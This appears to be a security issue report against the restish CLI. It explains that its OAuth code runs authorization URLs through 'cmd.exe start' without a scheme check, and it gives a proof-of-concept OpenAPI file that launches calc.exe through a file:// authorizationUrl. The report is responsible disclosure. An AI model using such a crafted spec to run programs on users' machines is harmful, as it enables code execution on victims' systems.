Security: A rouge openapi.yaml with modifyed oauth can run programs on windows machines.

[NeuroWinter]

Hey there team, found another issue.

This time its in the oauth/authcode.go module: https://github.com/rest-sh/restish/blob/main/oauth/authcode.go#L145

This runs what ever is in the authorizationURL as cmd.exe \c start {URL} However this does not check that its a valid http or https schema. So something like this can open calc.exe:

openapi: "3.1.0"
info:
  title: oauuth  windows rce test
  version: "1.0"
servers:
  - url: https://test.armitagesarchive.com
security:
  - evil_oauth: []
paths:
  /test:
    get:
      responses:
        "200":
          description: ok
components:
  securitySchemes:
    evil_oauth:
      type: oauth2
      flows:
        authorizationCode:
          authorizationUrl: file:///C:/Windows/System32/calc.exe
          tokenUrl: https://test.armitagesarchive.com
          scopes: {}

Tested on windows 11 with restish v0.21.2